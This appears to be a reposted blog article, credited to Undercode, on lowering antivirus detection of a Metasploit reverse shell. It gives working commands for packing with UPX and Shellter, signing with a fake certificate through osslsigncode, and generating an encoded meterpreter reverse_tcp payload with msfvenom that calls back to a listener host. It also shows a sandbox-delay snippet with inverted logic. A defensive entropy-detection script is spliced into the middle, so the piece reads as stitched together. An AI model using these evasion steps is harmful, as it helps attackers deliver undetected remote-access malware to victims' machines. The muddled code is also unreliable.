Reducing Reverse Shell Detection with Metadata and Packing Techniques

In this article, we explore how to reduce the detection rate of a Metasploit reverse shell from 58/72 to 33/72 on VirusTotal using techniques like custom packing, code signing, and metadata manipulation.

🔗 Reference: Medium

You Should Know: Practical Steps to Evade AV Detection

1. Custom Packing & Obfuscation

Packing the payload helps evade signature-based detection. Tools like UPX or custom packers can be used:

upx -9 payload.exe -o packed_payload.exe

For further obfuscation, use Shellter or Veil-Framework:

sudo apt install shellter 
shellter -a -f /path/to/payload.exe
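Packing raises the byte entropy of an executable, which is exactly what a defender looks for when triaging a sample. The following Python script is an added example written for this article, not code from the original post or from any of the tools it names; it computes Shannon entropy over the whole file and over fixed-size chunks, and additionally scans for the well-known UPX section-name strings. The 7.2 bits-per-byte threshold, the 4096-byte chunk size and the sample inputs are constructed assumptions for the demonstration and should be tuned against real corpora.

```python
import math
import random
from collections import Counter

# Heuristic parameters (assumed values, not from the article; tune per corpus).
PACKED_ENTROPY_THRESHOLD = 7.2   # bits per byte; plain x86 code is typically 5.5-6.5
CHUNK_SIZE = 4096                # analyse the file in fixed-size windows
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")  # section names / magic left by UPX


def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of `data` in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def chunk_entropies(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Entropy of each consecutive chunk; a packed payload shows up as a run of high-entropy windows."""
    return [shannon_entropy(data[i:i + chunk_size]) for i in range(0, len(data), chunk_size)]


def has_upx_marker(data: bytes) -> bool:
    """True if any of the UPX section-name / magic strings appears in the file bytes."""
    return any(marker in data for marker in UPX_MARKERS)


def classify(data: bytes) -> dict:
    """Triage verdict: entropy statistics plus a 'likely_packed' flag.

    The flag fires on either signal, so a low-entropy file that still carries
    UPX markers is reported, as is a high-entropy file with renamed sections.
    """
    overall = shannon_entropy(data)
    chunks = chunk_entropies(data)
    max_chunk = max(chunks) if chunks else 0.0
    upx = has_upx_marker(data)
    return {
        "overall_entropy": round(overall, 3),
        "max_chunk_entropy": round(max_chunk, 3),
        "upx_marker": upx,
        "likely_packed": overall >= PACKED_ENTROPY_THRESHOLD or upx,
    }


# --- Constructed sample inputs (not real binaries) --------------------------

def sample_plain() -> bytes:
    """Low-entropy stand-in for an unpacked file: repetitive ASCII text after an MZ header."""
    return b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 200


def sample_packed() -> bytes:
    """High-entropy stand-in for a packed/encrypted payload: 8 KiB of seeded pseudo-random bytes."""
    rng = random.Random(1)
    return b"MZ" + bytes(rng.getrandbits(8) for _ in range(8192))


def sample_plain_with_upx_names() -> bytes:
    """Low-entropy file that nevertheless carries UPX section names."""
    return sample_plain() + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00"


if __name__ == "__main__":
    for name, blob in (("plain", sample_plain()),
                       ("packed", sample_packed()),
                       ("plain+upx-names", sample_plain_with_upx_names())):
        print(name, classify(blob))
```

Entropy alone is a weak signal on its own (compressed resources, embedded certificates and installers are all high-entropy), so in practice this check feeds a score alongside import-table size, section permissions and signature validity rather than producing a verdict by itself.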

2. Code Signing with Fake Certificates

Signing the binary reduces suspicion. Use osslsigncode or SigThief:

osslsigncode sign -certs certificate.pem -key private.key -in payload.exe -out signed_payload.exe

3. Metadata Manipulation

Changing file properties can trick AV engines:

# PowerShell: Modify file metadata
(Get-Item "payload.exe").VersionInfo.FileDescription = "Legitimate Software"

4. Payload Encryption & Staged Loading

Encode the payload with msfvenom (the example below applies the shikata_ga_nai polymorphic encoder over five iterations; it is an XOR-based encoder rather than AES encryption):

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encrypted_payload.exe

5. Sandbox Evasion Techniques

Add sleep timers or environment checks:

import os
import time

# Only delay when the environment does not look like a VMware guest
if "VMware" not in os.environ.get("PROCESSOR_IDENTIFIER", ""):
    time.sleep(30)  # Delay execution in non-VM environments

execute_payload()  # placeholder for the payload entry point, not defined here

What Undercode Says

Reducing AV detection requires a mix of obfuscation, encryption, and social engineering. While signature-based detection can be bypassed with packing and signing, modern EDR solutions may still catch behavioral anomalies. Always test payloads in isolated environments before deployment.

Expected Output:

A stealthier reverse shell with significantly lower detection rates, suitable for red team engagements.

Prediction

As AV and EDR solutions improve, attackers will increasingly rely on fileless attacks, in-memory execution, and AI-driven obfuscation to bypass defenses. Future malware may leverage legitimate software vulnerabilities rather than traditional payloads.

References:

Reported By: Andrew Mamdouh122 – Hackers Feeds
Extra Hub: Undercode MoN